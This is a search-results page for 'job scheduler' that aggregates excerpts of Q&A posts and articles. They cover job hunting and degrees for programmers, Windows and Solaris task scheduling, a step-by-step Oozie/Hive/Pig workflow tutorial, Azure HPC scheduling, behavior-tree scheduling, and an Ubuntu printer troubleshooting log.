Search Results

Search found 7685 results on 308 pages for 'job scheduler'.

Page 40/308 | < Previous Page | 36 37 38 39 40 41 42 43 44 45 46 47  | Next Page >

  • How does a CS student negotiate in/after a job interview?

    - by Billy ONeal
    Alright, I've gotten to the second step in the interview process. At this point I'm working under the assumption that I might be offered a position -- flying my butt to Redmond would be quite an expense if they weren't at least considering me for something (*crosses fingers*). So, if one is offered a position, how should a CS student negotiate? I've heard a few strategies about dealing with software companies when you are being considered for a hire, but most of them are considering the developer in a powerful position. In such examinations, (s)he has lots of job experience, and may even be overqualified for what the employer is looking for. (s)he is part of a small job market of qualified developers, because 99% of applications companies receive are from those who are woefully under qualified. I'm in a completely different position. I think I compare favorably to most of my fellow students, and I have been a programmer for almost 10 years, but often I still feel green compared to most of my coworkers. I'm in a position where the employer holds most of the chips; they'd be doing me quite a favor by hiring me. I think this scenario is considerably different than the targets for most of the advice I've seen. Above all, I don't want to be such a prick negotiating that it damages my chances to actually operate in a position, even if it means not negotiating at all. How should one approach a scenario like this? P.S. If this is off topic feel free to close it -- I think it's borderline and I'm of the opinion that it's better to ask and be closed than not ask at all ;)

    Read the article

  • Will an online degree get you a job that requires "CS or equivalent 4-year degree"? [on hold]

    - by qel
    I'm a nerdy slacker type who didn't get my life together till I was 30. I've had a real job for a couple years doing C#/SQL. I've gotten several raises, but I'm making less than most developers, and the atmosphere is ... not positive. Looking for a new job, I think my applications get thrown out because I don't have a degree. And I want to finish a Bachelor's just to feel like less of a loser. I have a lot of college credits from 1996-2003 and a low GPA, so I don't know if that's worth much. An online degree looks like a good option, but I just don't know what I should be looking at for online schools because they all look like fake degrees. If they had programs equivalent to a real Comp Sci degree, I don't think they would have weird sounding names like they do. University of Phoenix has a B.S./Information Technology-Software Engineering. DeVry has a B.S./Computer Engineering Technology program. But that's not CS, and most other things I see have even more fake-sounding names. Are these useless degrees? Some people say DeVry and UoP are acceptable, some people say they're a joke. I have enough experience now, though, that maybe all I'm missing is being able to check the box that I have a 4-year degree. Harvard Extension seems like a real degree, even if it isn't a real Harvard degree, but I'd have to live there at least 3 months, which kinda defeats the purpose of an online degree fitting around work.

    Read the article

  • Is there a website that scrapes job postings to determine the popularity of web technologies? [closed]

    - by dB'
    I'm often in a position where I need to choose between a number of web technologies. These technologies might be programming languages, or web application frameworks, or types of databases, or some other kind of toolkit used by programmers. More often than not, after some doing research, I end up with a list of contenders that are all equally viable. They're all powerful enough to solve my problem, they're all popular and well supported, and they're all equally familiar/unfamiliar to me. There's no obvious rationale by which to choose between them. Still, I need to pick one, so at this point I usually ask myself a hypothetical question: which one of these technologies, if I invest in learning it, would be most helpful to me in a job search? Where can I go on the internet to answer this question? Is there a website/service that scrapes the texts of worldwide job postings and would allow me to compare, say, the number of employers looking for expertise in technology x vs. technology y? (Where x and y are Rails vs. Djando, Java vs. Python, Brainfuck vs. LOLCode, etc.)

    Read the article

  • How do I tell my parents that landing a job is what actually counts?

    - by shovonr
    On one side, I just want to get a degree with a 3.0 GPA. On the other side, my parents want more than just a 3. Now here's the thing. I program with a passion. I spend day and night programming. And I ace all my programming courses. However, I do terrible on all my elective courses -- such as writing, history, and all that stuff -- which only leaves me with a 3.1 to 3.2 GPA. And my parents want more. They think that university is like high school, where you need super-stellar grades to get to the next level. But they don't realize that good enough grades will land me a job. And they don't realize that a programmer needs to practice to become good at programming, and that having good skills is what will land a job in a nice software development company. Thankfully, though, they don't threaten to beat me with a baseball bat or anything like that. They just occasionally give me the little "tsk-tsk". But even that little "tsk-tsk" makes me feel guilty for opening up an IDE. And on top of that, I procrastinate because of that feeling of guilt. So now, I want to come clean with them. I want to know what's a good way to do that. [Edit] OK, so now, I realized, I should aim for higher grades, as some have suggested below.

    Read the article

  • How does Windows Task Scheduler detect that a task is already running?

    - by Dan C
    I have an application on Windows Server 2008 that takes different command-line parameters. For example: myapp.exe /A myapp.exe /B I have created a task scheduler task for each of those. While "myapp.exe /A" is running, I want to prevent another instance of it from starting. However, I still want "myapp.exe /B" to be able to run (again, though only one instance of it at a time). How can I set this up?

    Read the article

  • What does N years of experience with a language really mean?

    - by marcgg
    I've been looking at jobs descriptions since I'm graduating soon and looking for a job and what's always coming back - I'm not teaching you anything - is the "N years of experience in this language". It has been discussed in this question that if you work professionally with let's say Ruby for 2 years, but during these two years you also did some C# and PHP and were actually coding in Ruby 50% of the time. Do you say you have 1 year of experience in Ruby? 2 years? Another issue that hasn't been reviewed in the other post is for "non-professional experience". I'll give you a personal example: I've been working with Ruby on Rails since 2004 while at school. I did a lot of personal projects and school projects using this technology. I also used Rails in 2 6-month internships. Do I have 5 years of Rails experience (2004-now)? Do I have 1 year(2 internships)? Do I have nothing? I feel like I don't deserve the credit for 5 years, because the first years I wasn't working a lot with rails, but since last year I launched some websites and invested myself a lot in this technology and just saying 1 year doesn't really reflect how much I know the technology... Another example: I Learned C++ at school and did 1 big project with it (2-3 month of work and a semester of classes). I never used it in a company but I'd be able to be productive fairly quickly if I had to work on a C++ project and I have a good grasp of the concepts. Do I have no experience? 3 months? 6 months? ... something else? What I'm really trying to do is to find a way to present my skill set in a way that is compliant to what recruiters expect. I also don't want to end up at an interview that would go something like this... Recruiter (finding out the horrible truth): Oh but you said that you had 2 years of experience with this when you have none! / slaps me in the face / Me (in pain): Oh! The irony! Recruiter (yelling): Get out of my office / calls security, punches me in the throat /

    Read the article

  • Understanding Process Scheduling in Oracle Solaris

    - by rickramsey
    The process scheduler in the Oracle Solaris kernel allocates CPU resources to processes. By default, the scheduler tries to give every process relatively equal access to the available CPUs. However, you might want to specify that certain processes be given more resources than others. That's where classes come in. A process class defines a scheduling policy for a set of processes. These three resources will help you understand and manage it process classes: Blog: Overview of Process Scheduling Classes in the Oracle Solaris Kernel by Brian Bream Timesharing, interactive, fair-share scheduler, fixed priority, system, and real time. What are these? Scheduling classes in the Solaris kernel. Brian Bream describes them and how the kernel manages them through context switching. Blog: Process Scheduling at the Thread Level by Brian Bream The Fair Share Scheduler allows you to dispatch processes not just to a particular CPU, but to CPU threads. Brian Bream explains how to use and provides examples. Docs: Overview of the Fair Share Scheduler by Oracle Solaris Documentation Team This official Oracle Solaris documentation set provides the nitty-gritty details for setting up classes and managing your processes. Covers: Introduction to the Scheduler CPU Share Definition CPU Shares and Process State CPU Share Versus Utilization CPU Share Examples FSS Configuration FSS and Processor Sets Combining FSS With Other Scheduling Classes Setting the Scheduling Class for the System Scheduling Class on a System with Zones Installed Commands Used With FSS -Rick Follow me on: Blog | Facebook | Twitter | Personal Twitter | YouTube | The Great Peruvian Novel

    Read the article

  • Building Simple Workflows in Oozie

    - by dan.mcclary
    Introduction More often than not, data doesn't come packaged exactly as we'd like it for analysis. Transformation, match-merge operations, and a host of data munging tasks are usually needed before we can extract insights from our Big Data sources. Few people find data munging exciting, but it has to be done. Once we've suffered that boredom, we should take steps to automate the process. We want codify our work into repeatable units and create workflows which we can leverage over and over again without having to write new code. In this article, we'll look at how to use Oozie to create a workflow for the parallel machine learning task I described on Cloudera's site. Hive Actions: Prepping for Pig In my parallel machine learning article, I use data from the National Climatic Data Center to build weather models on a state-by-state basis. NCDC makes the data freely available as gzipped files of day-over-day observations stretching from the 1930s to today. In reading that post, one might get the impression that the data came in a handy, ready-to-model files with convenient delimiters. The truth of it is that I need to perform some parsing and projection on the dataset before it can be modeled. If I get more observations, I'll want to retrain and test those models, which will require more parsing and projection. This is a good opportunity to start building up a workflow with Oozie. I store the data from the NCDC in HDFS and create an external Hive table partitioned by year. This gives me flexibility of Hive's query language when I want it, but let's me put the dataset in a directory of my choosing in case I want to treat the same data with Pig or MapReduce code. CREATE EXTERNAL TABLE IF NOT EXISTS historic_weather(column 1, column2) PARTITIONED BY (yr string) STORED AS ... LOCATION '/user/oracle/weather/historic'; As new weather data comes in from NCDC, I'll need to add partitions to my table. That's an action I should put in the workflow. Similarly, the weather data requires parsing in order to be useful as a set of columns. Because of their long history, the weather data is broken up into fields of specific byte lengths: x bytes for the station ID, y bytes for the dew point, and so on. The delimiting is consistent from year to year, so writing SerDe or a parser for transformation is simple. Once that's done, I want to select columns on which to train, classify certain features, and place the training data in an HDFS directory for my Pig script to access. ALTER TABLE historic_weather ADD IF NOT EXISTS PARTITION (yr='2010') LOCATION '/user/oracle/weather/historic/yr=2011'; INSERT OVERWRITE DIRECTORY '/user/oracle/weather/cleaned_history' SELECT w.stn, w.wban, w.weather_year, w.weather_month, w.weather_day, w.temp, w.dewp, w.weather FROM ( FROM historic_weather SELECT TRANSFORM(...) USING '/path/to/hive/filters/ncdc_parser.py' as stn, wban, weather_year, weather_month, weather_day, temp, dewp, weather ) w; Since I'm going to prepare training directories with at least the same frequency that I add partitions, I should also add that to my workflow. Oozie is going to invoke these Hive actions using what's somewhat obviously referred to as a Hive action. Hive actions amount to Oozie running a script file containing our query language statements, so we can place them in a file called weather_train.hql. Starting Our Workflow Oozie offers two types of jobs: workflows and coordinator jobs. Workflows are straightforward: they define a set of actions to perform as a sequence or directed acyclic graph. Coordinator jobs can take all the same actions of Workflow jobs, but they can be automatically started either periodically or when new data arrives in a specified location. To keep things simple we'll make a workflow job; coordinator jobs simply require another XML file for scheduling. The bare minimum for workflow XML defines a name, a starting point, and an end point: <workflow-app name="WeatherMan" xmlns="uri:oozie:workflow:0.1"> <start to="ParseNCDCData"/> <end name="end"/> </workflow-app> To this we need to add an action, and within that we'll specify the hive parameters Also, keep in mind that actions require <ok> and <error> tags to direct the next action on success or failure. <action name="ParseNCDCData"> <hive xmlns="uri:oozie:hive-action:0.2"> <job-tracker>localhost:8021</job-tracker> <name-node>localhost:8020</name-node> <configuration> <property> <name>oozie.hive.defaults</name> <value>/user/oracle/weather_ooze/hive-default.xml</value> </property> </configuration> <script>ncdc_parse.hql</script> </hive> <ok to="WeatherMan"/> <error to="end"/> </action> There are a couple of things to note here: I have to give the FQDN (or IP) and port of my JobTracker and NameNode. I have to include a hive-default.xml file. I have to include a script file. The hive-default.xml and script file must be stored in HDFS That last point is particularly important. Oozie doesn't make assumptions about where a given workflow is being run. You might submit workflows against different clusters, or have different hive-defaults.xml on different clusters (e.g. MySQL or Postgres-backed metastores). A quick way to ensure that all the assets end up in the right place in HDFS is just to make a working directory locally, build your workflow.xml in it, and copy the assets you'll need to it as you add actions to workflow.xml. At this point, our local directory should contain: workflow.xml hive-defaults.xml (make sure this file contains your metastore connection data) ncdc_parse.hql Adding Pig to the Ooze Adding our Pig script as an action is slightly simpler from an XML standpoint. All we do is add an action to workflow.xml as follows: <action name="WeatherMan"> <pig> <job-tracker>localhost:8021</job-tracker> <name-node>localhost:8020</name-node> <script>weather_train.pig</script> </pig> <ok to="end"/> <error to="end"/> </action> Once we've done this, we'll copy weather_train.pig to our working directory. However, there's a bit of a "gotcha" here. My pig script registers the Weka Jar and a chunk of jython. If those aren't also in HDFS, our action will fail from the outset -- but where do we put them? The Jython script goes into the working directory at the same level as the pig script, because pig attempts to load Jython files in the directory from which the script executes. However, that's not where our Weka jar goes. While Oozie doesn't assume much, it does make an assumption about the Pig classpath. Anything under working_directory/lib gets automatically added to the Pig classpath and no longer requires a REGISTER statement in the script. Anything that uses a REGISTER statement cannot be in the working_directory/lib directory. Instead, it needs to be in a different HDFS directory and attached to the pig action with an <archive> tag. Yes, that's as confusing as you think it is. You can get the exact rules for adding Jars to the distributed cache from Oozie's Pig Cookbook. Making the Workflow Work We've got a workflow defined and have collected all the components we'll need to run. But we can't run anything yet, because we still have to define some properties about the job and submit it to Oozie. We need to start with the job properties, as this is essentially the "request" we'll submit to the Oozie server. In the same working directory, we'll make a file called job.properties as follows: nameNode=hdfs://localhost:8020 jobTracker=localhost:8021 queueName=default weatherRoot=weather_ooze mapreduce.jobtracker.kerberos.principal=foo dfs.namenode.kerberos.principal=foo oozie.libpath=${nameNode}/user/oozie/share/lib oozie.wf.application.path=${nameNode}/user/${user.name}/${weatherRoot} outputDir=weather-ooze While some of the pieces of the properties file are familiar (e.g., JobTracker address), others take a bit of explaining. The first is weatherRoot: this is essentially an environment variable for the script (as are jobTracker and queueName). We're simply using them to simplify the directives for the Oozie job. The oozie.libpath pieces is extremely important. This is a directory in HDFS which holds Oozie's shared libraries: a collection of Jars necessary for invoking Hive, Pig, and other actions. It's a good idea to make sure this has been installed and copied up to HDFS. The last two lines are straightforward: run the application defined by workflow.xml at the application path listed and write the output to the output directory. We're finally ready to submit our job! After all that work we only need to do a few more things: Validate our workflow.xml Copy our working directory to HDFS Submit our job to the Oozie server Run our workflow Let's do them in order. First validate the workflow: oozie validate workflow.xml Next, copy the working directory up to HDFS: hadoop fs -put working_dir /user/oracle/working_dir Now we submit the job to the Oozie server. We need to ensure that we've got the correct URL for the Oozie server, and we need to specify our job.properties file as an argument. oozie job -oozie http://url.to.oozie.server:port_number/ -config /path/to/working_dir/job.properties -submit We've submitted the job, but we don't see any activity on the JobTracker? All I got was this funny bit of output: 14-20120525161321-oozie-oracle This is because submitting a job to Oozie creates an entry for the job and places it in PREP status. What we got back, in essence, is a ticket for our workflow to ride the Oozie train. We're responsible for redeeming our ticket and running the job. oozie -oozie http://url.to.oozie.server:port_number/ -start 14-20120525161321-oozie-oracle Of course, if we really want to run the job from the outset, we can change the "-submit" argument above to "-run." This will prep and run the workflow immediately. Takeaway So, there you have it: the somewhat laborious process of building an Oozie workflow. It's a bit tedious the first time out, but it does present a pair of real benefits to those of us who spend a great deal of time data munging. First, when new data arrives that requires the same processing, we already have the workflow defined and ready to run. Second, as we build up a set of useful action definitions over time, creating new workflows becomes quicker and quicker.

    Read the article

  • How does a programmer who doesn't know how to program get a job ? [closed]

    - by A programmer
    I often read about this and I'm curious: if there programmers who can't program, how did they get a programming job in the first place? They must bring some value to the company they're working for, otherwise they would be fired. I don't think "programmers who don't know how to program" means "bad programmers" in this case ? Even if they are bad programmers, they still know (badly) how to write (bad) programs. So what defines programmers who can't program ?

    Read the article

  • What stressors do programmers encounter on the job, and how do you deal with them? [closed]

    - by Matthew Rodatus
    Learning to manage stress is vital to staying healthy while working at any job. A necessary subtask is learning to recognize and limit the sources of stress. But, in the midst of the daily grind, it can be difficult to recognize sources of stress (especially for an intense, focused persona such as a programmer). What types of stressors should programmers look out for, and how can they be managed?

    Read the article

  • Can not print after upgrading from 12.x to 14.04

    - by user318889
    After upgrading from V12.04 to V14.04 I am not able to print. I am using an HP LaserJet 400 M451dn. The printer troubleshooter told me that there is no solution to the problem. This is the output of the advanced diagnositc output. (Due to limited space I cut the output!) Can anybody tell me what is going wrong. I am using the printer via USB ? Page 1 (Scheduler not running?): {'cups_connection_failure': False} Page 2 (Is local server publishing?): {'local_server_exporting_printers': False} Page 3 (Choose printer): {'cups_dest': , 'cups_instance': None, 'cups_queue': u'HP-LaserJet-400-color-M451dn', 'cups_queue_listed': True} Page 4 (Check printer sanity): {'cups_device_uri_scheme': u'hp', 'cups_printer_dict': {'device-uri': u'hp:/usb/HP_LaserJet_400_color_M451dn?serial=CNFF308670', 'printer-info': u'Hewlett-Packard HP LaserJet 400 color M451dn', 'printer-is-shared': True, 'printer-location': u'Pinatubo', 'printer-make-and-model': u'HP LJ 300-400 color M351-M451 Postscript (recommended)', 'printer-state': 4, 'printer-state-message': u'', 'printer-state-reasons': [u'none'], 'printer-type': 8556636, 'printer-uri-supported': u'ipp://localhost:631/printers/HP-LaserJet-400-color-M451dn'}, 'cups_printer_remote': False, 'hplip_output': (['', '\x1b[01mHP Linux Imaging and Printing System (ver. 3.14.6)\x1b[0m', '\x1b[01mDevice Information Utility ver. 5.2\x1b[0m', '', 'Copyright (c) 2001-13 Hewlett-Packard Development Company, LP', 'This software comes with ABSOLUTELY NO WARRANTY.', 'This is free software, and you are welcome to distribute it', 'under certain conditions. See COPYING file for more details.', '', '', '\x1b[01mhp:/usb/HP_LaserJet_400_color_M451dn?serial=CNFF308670\x1b[0m', '', '\x1b[01mDevice Parameters (dynamic data):\x1b[0m', '\x1b[01m Parameter Value(s) \x1b[0m', ' ---------------------------- ----------------------------------------------------------', ' back-end hp ', " cups-printers ['HP-LaserJet-400-color-M451dn'] ", ' cups-uri hp:/usb/HP_LaserJet_400_color_M451dn?serial=CNFF308670 ', ' dev-file ', ' device-state -1 ', ' device-uri hp:/usb/HP_LaserJet_400_color_M451dn?serial=CNFF308670 ', ' deviceid ', ' error-state 101 ', ' host ', ' is-hp True ', ' panel 0 ', ' panel-line1 ', ' panel-line2 ', ' port 1 ', ' serial CNFF308670 ', ' status-code 5002 ', ' status-desc ', '\x1b[01m', 'Model Parameters (static data):\x1b[0m', '\x1b[01m Parameter Value(s) \x1b[0m', ' ---------------------------- ----------------------------------------------------------', ' align-type 0 ', ' clean-type 0 ', ' color-cal-type 0 ', ' copy-type 0 ', ' embedded-server-type 0 ', ' fax-type 0 ', ' fw-download False ', ' icon hp_color_laserjet_cp2025.png ', ' io-mfp-mode 1 ', ' io-mode 1 ', ' io-support 6 ', ' job-storage 0 ', ' linefeed-cal-type 0 ', ' model HP_LaserJet_400_color_M451dn ', ' model-ui HP LaserJet 400 Color m451dn ', ' model1 HP LaserJet 400 Color M451dn ', ' monitor-type 0 ', ' panel-check-type 0 ', ' pcard-type 0 ', ' plugin 0 ', ' plugin-reason 0 ', ' power-settings 0 ', ' ppd-name lj_300_400_color_m351_m451 ', ' pq-diag-type 0 ', ' r-type 0 ', ' r0-agent1-kind 4 ', ' r0-agent1-sku CE410A/CE410X ', ' r0-agent1-type 1 ', ' r0-agent2-kind 4 ', ' r0-agent2-sku CE411A ', ' r0-agent2-type 4 ', ' r0-agent3-kind 4 ', ' r0-agent3-sku CE413A ', ' r0-agent3-type 5 ', ' r0-agent4-kind 4 ', ' r0-agent4-sku CE412A ', ' r0-agent4-type 6 ', ' scan-src 0 ', ' scan-type 0 ', ' status-battery-check 0 ', ' status-dynamic-counters 0 ', ' status-type 3 ', ' support-released True ', ' support-subtype 2202411 ', ' support-type 2 ', ' support-ver 3.12.2 ', " tech-class ['Postscript'] ", " tech-subclass ['Normal'] ", ' tech-type 4 ', ' usb-pid 3882 ', ' usb-vid 1008 ', ' wifi-config 0 ', '\x1b[01m', 'Status History (most recent first):\x1b[0m', '\x1b[01m Date/Time Code Status Description User Job ID \x1b[0m', ' -------------------- ----- ---------------------------------------- -------- --------', ' 08/21/14 00:07:25 5012 Device communication error richard 0 ', ' 08/20/14 13:42:44 500 Started a print job richard 4214 ', '', '', 'Done.', ''], ['\x1b[35;01mwarning: No display found.\x1b[0m', '\x1b[31;01merror: hp-info -u/--gui requires Qt4 GUI support. Entering interactive mode.\x1b[0m', '\x1b[31;01merror: Unable to communicate with device (code=12): hp:/usb/HP_LaserJet_400_color_M451dn?serial=CNFF308670\x1b[0m', '\x1b[31;01merror: Error opening device (Device not found).\x1b[0m', ''], 0), 'is_cups_class': False, 'local_cups_queue_attributes': {'charset-configured': u'utf-8', 'charset-supported': [u'us-ascii', u'utf-8'], 'color-supported': True, 'compression-supported': [u'none', u'gzip'], 'copies-default': 1, 'copies-supported': (1, 9999), 'cups-version': u'1.7.2', 'device-uri': u'hp:/usb/HP_LaserJet_400_color_M451dn?serial=CNFF308670', 'document-format-default': u'application/octet-stream', 'document-format-supported': [u'application/octet-stream', u'application/pdf', u'application/postscript', u'application/vnd.adobe-reader-postscript', u'application/vnd.cups-command', u'application/vnd.cups-pdf', u'application/vnd.cups-pdf-banner', u'application/vnd.cups-postscript', u'application/vnd.cups-raw', u'application/vnd.samsung-ps', u'application/x-cshell', u'application/x-csource', u'application/x-perl', u'application/x-shell', u'image/gif', u'image/jpeg', u'image/png', u'image/tiff', u'image/urf', u'image/x-bitmap', u'image/x-photocd', u'image/x-portable-anymap', u'image/x-portable-bitmap', u'image/x-portable-graymap', u'image/x-portable-pixmap', u'image/x-sgi-rgb', u'image/x-sun-raster', u'image/x-xbitmap', u'image/x-xpixmap', u'image/x-xwindowdump', u'text/css', u'text/html', u'text/plain'], 'finishings-default': 3, 'finishings-supported': [3], 'generated-natural-language-supported': [u'en-us'], 'ipp-versions-supported': [u'1.0', u'1.1', u'2.0', u'2.1'], 'ippget-event-life': 15, 'job-creation-attributes-supported': [u'copies', u'finishings', u'ipp-attribute-fidelity', u'job-hold-until', u'job-name', u'job-priority', u'job-sheets', u'media', u'media-col', u'multiple-document-handling', u'number-up', u'output-bin', u'orientation-requested', u'page-ranges', u'print-color-mode', u'print-quality', u'printer-resolution', u'sides'], 'job-hold-until-default': u'no-hold', 'job-hold-until-supported': [u'no-hold', u'indefinite', u'day-time', u'evening', u'night', u'second-shift', u'third-shift', u'weekend'], 'job-ids-supported': True, 'job-k-limit': 0, 'job-k-octets-supported': (0, 470914416), 'job-page-limit': 0, 'job-priority-default': 50, 'job-priority-supported': [100], 'job-quota-period': 0, 'job-settable-attributes-supported': [u'copies', u'finishings', u'job-hold-until', u'job-name', u'job-priority', u'media', u'media-col', u'multiple-document-handling', u'number-up', u'output-bin', u'orientation-requested', u'page-ranges', u'print-color-mode', u'print-quality', u'printer-resolution', u'sides'], 'job-sheets-default': (u'none', u'none'), 'job-sheets-supported': [u'none', u'classified', u'confidential', u'form', u'secret', u'standard', u'topsecret', u'unclassified'], 'jpeg-k-octets-supported': (0, 470914416), 'jpeg-x-dimension-supported': (0, 65535), 'jpeg-y-dimension-supported': (1, 65535), 'marker-change-time': 0, 'media-bottom-margin-supported': [423], 'media-col-default': u'(unknown IPP value tag 0x34)', 'media-col-supported': [u'media-bottom-margin', u'media-left-margin', u'media-right-margin', u'media-size', u'media-source', u'media-top-margin', u'media-type'], 'media-default': u'iso_a4_210x297mm', 'media-left-margin-supported': [423], 'media-right-margin-supported': [423],

    Read the article

  • What should I wear to a job interview with a game development company?

    - by Bill
    Many game development companies are less formal in terms of workplace attire than other types of software development houses. For example, I know that one place at which I will be interviewing soon has a predominant workplace culture of jeans and polos or t-shirts. Should I wear a suit? Shirt and tie? Shirt and sport jacket, with or without tie? I want to show that I'm serious about the job, but that I understand the culture, too.

    Read the article

  • IT Job Titles ? What Do They Mean?

    Although only a few decades old, the information technology or IT field is as broad and deep as industries that have been around for centuries. IT job categories, titles and specialties abound -- so ... [Author: Allen B. Ury - Computers and Internet - March 27, 2010]

    Read the article

  • xcopy files and directory

    - by user1044937
    I have a folder named "C:\Jobs\job#1" , "C:\Jobs\job#2" "C:\Jobs\job#3" etc and a lot of directories and sub-directories under it. I want to get the all the directories under Jobs and xcopy them to C:\backup. Then I want to xcopy all the files under each Job#1, 2 ,3 etc. to C:\backup\job#1\month\\*.* To make it clearer. Source dir = C:\Jobs\job#1\"myfiles&dir" Destination dir = C:\Backup\job#1\month\"myfiles&dir" then do the next folder Source dir = C:\Jobs\job#2\"myfiles&dir" Destination dir = C:\Backup\job#2\month\"myfiles&dir" ...until all folders are back-up. Since the job folder keep increasing, by doing it this way I don't have to add extra code on this script except modify the month. Thank you.

    Read the article

  • Is it difficult to get a job at Microsoft?

    - by Maxtor
    I'm curious how difficult it really is to get a job working for Microsoft. Is Microsoft similar to Google in a sense that they hire people who are really good at programming? Also, does participating in communities such as the forums at Microsoft help (if at all) you with getting selected for an interview ? How about being a MVP in something like C# and/or .NET? Edit: This question refers only to programming jobs.

    Read the article

  • SQL SERVER – What is SSRS and Why SSRS is asked for in many Job Opening?

    - by Pinal Dave
    This example is from the Beginning SSRS by Kathi Kellenberger. Supporting files are available with a free download from the www.Joes2Pros.com web site. This will be a 5 day blog post in getting started with SSRS. Today will show the importance of SSRS in the business. Why is SSRS asked for in so many job openings? If you talk to an SSRS expert it’s very clear to them exactly why companies really need this invention and how it saves time and adds business value. You don’t have to be an SSRS expert to know its value or to start using it. For example you don’t have to be an airline pilot to know the usefulness of modern transportation. Even the people who don’t know how to run SSRS but need the reports can tell you why that is needed. This blog post will go into why SSRS is an important invention by showing how it improves the usage of information in your company. Before SSRS there has always been a need for a company to benefit from the use of its own information. Excel spreadsheets have been a popular way to do this for a long time. With SSRS you can still use this solution and gain many other options too. A friend of mine told me a story about doing database work in the 90s for a major company and how he wished SSRS was available back then. The Vice President of the marketing channel would often come to him just before an important meeting with the board of directors. He often needed to show how certain product sales were performing over time. All this information was in the database so it was my friend’s job to get the information out and organized into a medium the VP could use. This medium was usually Excel. The VP often had meetings all over the world where he showcased this Excel report. The solution to get the VP to him anywhere he was in the world was an Excel file attached to an e-mail. This worked pretty well but with some drawbacks. One time my friend sent the wrong file in the e-mail. A few minutes later my friend realized his mistake and sent another frantic e-mail to VP. This one was saying to ignore the last e-mail and use this newer one. Would the VP see the correct e-mail in time? If SSRS had been available, my friend could have created a solution that let the VP run the report any time he wished. The report could have been published to the company intranet where the VP could run it from any of the offices he happened to be traveling to that month. There is a fair amount of work up front to develop and publish the report, but once that work is completed, the report can be reused as many times as needed. My friend could even be on vacation for the first day of the monthly and the VP can get his real-time report. Not only could the report show the most recent data, the VP could choose to view reports of previous months with just a few clicks. The deployed SSRS is user friendly, and can also be configured to protect reports from being run by the wrong people. Tomorrow’s Post Tomorrow’s blog post will show how to know if you already have SSRS installed. If you want to learn SSRS in easy to simple words – I strongly recommend you to get Beginning SSRS book from Joes 2 Pros. Reference: Pinal Dave (http://blog.sqlauthority.com) Filed under: PostADay, SQL, SQL Authority, SQL Query, SQL Server, SQL Tips and Tricks, T SQL Tagged: Reporting Services, SSRS

    Read the article

  • Windows Azure Recipe: High Performance Computing

    - by Clint Edmonson
    One of the most attractive ways to use a cloud platform is for parallel processing. Commonly known as high-performance computing (HPC), this approach relies on executing code on many machines at the same time. On Windows Azure, this means running many role instances simultaneously, all working in parallel to solve some problem. Doing this requires some way to schedule applications, which means distributing their work across these instances. To allow this, Windows Azure provides the HPC Scheduler. This service can work with HPC applications built to use the industry-standard Message Passing Interface (MPI). Software that does finite element analysis, such as car crash simulations, is one example of this type of application, and there are many others. The HPC Scheduler can also be used with so-called embarrassingly parallel applications, such as Monte Carlo simulations. Whatever problem is addressed, the value this component provides is the same: It handles the complex problem of scheduling parallel computing work across many Windows Azure worker role instances. Drivers Elastic compute and storage resources Cost avoidance Solution Here’s a sketch of a solution using our Windows Azure HPC SDK: Ingredients Web Role – this hosts a HPC scheduler web portal to allow web based job submission and management. It also exposes an HTTP web service API to allow other tools (including Visual Studio) to post jobs as well. Worker Role – typically multiple worker roles are enlisted, including at least one head node that schedules jobs to be run among the remaining compute nodes. Database – stores state information about the job queue and resource configuration for the solution. Blobs, Tables, Queues, Caching (optional) – many parallel algorithms persist intermediate and/or permanent data as a result of their processing. These fast, highly reliable, parallelizable storage options are all available to all the jobs being processed. Training Here is a link to online Windows Azure training labs where you can learn more about the individual ingredients described above. (Note: The entire Windows Azure Training Kit can also be downloaded for offline use.) Windows Azure HPC Scheduler (3 labs)  The Windows Azure HPC Scheduler includes modules and features that enable you to launch and manage high-performance computing (HPC) applications and other parallel workloads within a Windows Azure service. The scheduler supports parallel computational tasks such as parametric sweeps, Message Passing Interface (MPI) processes, and service-oriented architecture (SOA) requests across your computing resources in Windows Azure. With the Windows Azure HPC Scheduler SDK, developers can create Windows Azure deployments that support scalable, compute-intensive, parallel applications. See my Windows Azure Resource Guide for more guidance on how to get started, including links web portals, training kits, samples, and blogs related to Windows Azure.

    Read the article

  • Event Driven Behavior Tree: deterministic traversal order with parallel

    - by Heisenbug
    I've studied several articles and listen some talks about behavior trees (mostly the resources available on AIGameDev by Alex J. Champandard). I'm particularly interested on event driven behavior trees, but I have still some doubts on how to implement them correctly using a scheduler. Just a quick recap: Standard Behavior Tree Each execution tick the tree is traversed from the root in depth-first order The execution order is implicitly expressed by the tree structure. So in the case of behaviors parented to a parallel node, even if both children are executed during the same traversing, the first leaf is always evaluated first. Event Driven BT During the first traversal the nodes (tasks) are enqueued using a scheduler which is responsible for updating only running ones every update The first traversal implicitly produce a depth-first ordered queue in the scheduler Non leaf nodes stays suspended mostly of the time. When a leaf node terminate(either with success or fail status) the parent (observer) is waked up allowing the tree traversing to continue and new tasks will be enqueued in the scheduler Without parallel nodes in the tree there will be up to 1 task running in the scheduler Without parallel nodes, the tasks in the queue(excluding dynamic priority implementation) will be always ordered in a depth-first order (is this right?) Now, from what is my understanding of a possible implementation, there are 2 requirements I think must be respected(I'm not sure though): Now, some requirements I think needs to be guaranteed by a correct implementation are: The result of the traversing should be independent from which implementation strategy is used. The traversing result must be deterministic. I'm struggling trying to guarantee both in the case of parallel nodes. Here's an example: Parallel_1 -->Sequence_1 ---->leaf_A ---->leaf_B -->leaf_C Considering a FIFO policy of the scheduler, before leaf_A node terminates the tasks in the scheduler are: P1(suspended),S1(suspended),leaf_A(running),leaf_C(running) When leaf_A terminate leaf_B will be scheduled (at the end of the queue), so the queue will become: P1(suspended),S1(suspended),leaf_C(running),leaf_B(running) In this case leaf_B will be executed after leaf_C at every update, meanwhile with a non event-driven traversing from the root node, the leaf_B will always be evaluated before leaf_A. So I have a couple of question: do I have understand correctly how event driven BT work? How can I guarantee the depth first order is respected with such an implementation? is this a common issue or am I missing something?

    Read the article

  • Why can't PHP script write a file on server 2008 via command line or task scheduler?

    - by rg89
    I have a PHP script. It runs well when I use a browser. It writes an XML file in the same directory. The script takes ~60 seconds to run, and the resulting XML file is ~16 MB. I am running PHP 5.2.13 via FastCGI on Server 2008 64 bit. I created a task in task scheduler to run c:\php5\php.exe "D:\inetpub\tools\something.php" No error returned, but no file created. If I run this same path and argument at a command line it does not error and does not create the file. I am doing a simple fopen fwrite fclose to save the contents of a php variable to a .xml file, and the file only gets created when the script is run through the browser. Thanks

    Read the article

  • How can I reinstall QoS Packet Scheduler if it was removed from the winxp installation by nLite?

    - by Irwin1138
